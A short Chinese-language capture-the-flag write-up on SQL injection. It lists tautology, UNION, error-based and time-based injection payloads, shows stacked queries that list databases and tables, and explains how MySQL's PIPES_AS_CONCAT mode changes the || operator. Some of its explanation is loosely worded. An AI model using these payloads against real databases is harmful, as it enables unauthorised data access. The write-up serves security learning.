sql注入分为很多种,
1′ or ‘1’=’1’# #or语句
1′ order by 3# #order语句
1′ union select 1,2,3# #联合查询
1’and(select extractvalue(1,concat(‘~’,(select database())))) #报错注入
1′ and if(length(database())>1,sleep(5),1)–+ #时间注入
在尝试了上述几种之后都没有回显,直到采取堆叠注入
先查库—1;show databases;
数据库里面明显包含flag
然后继续查表—1;show tables;
这句话的意思是有两个目录表,一个是1另一个就是flag,那么我们通过查目录试试能否找出flag
直接查目录发现失败,推测可能更改过系统设置,我们知道flag在目录里但是不能直接打开需要更改设置后访问,这里需要扩展一下PIPES_AS_CONCAT 函数的含义,它的作用就是将两个任务重合在一起执行。如下所示
sql_mode 设置了 PIPES_AS_CONCAT 时,|| 就是字符串连接符,相当于CONCAT() 函数
当 sql_mode 没有设置 PIPES_AS_CONCAT 时 (默认没有设置),|| 就是逻辑或,相当于OR函数
第一种就按默认没有配置来进行,此时||就是逻辑或
||在命令执行中见过,
回顾:
command1;command2顺序执行
command1 || command2
如果command1执行失败,则执行command2
command1 && command2
如果command1执行成功,则执行command2
我们通过构造payload来执行第一个可执行语句来访问第二个flag目录就能打开了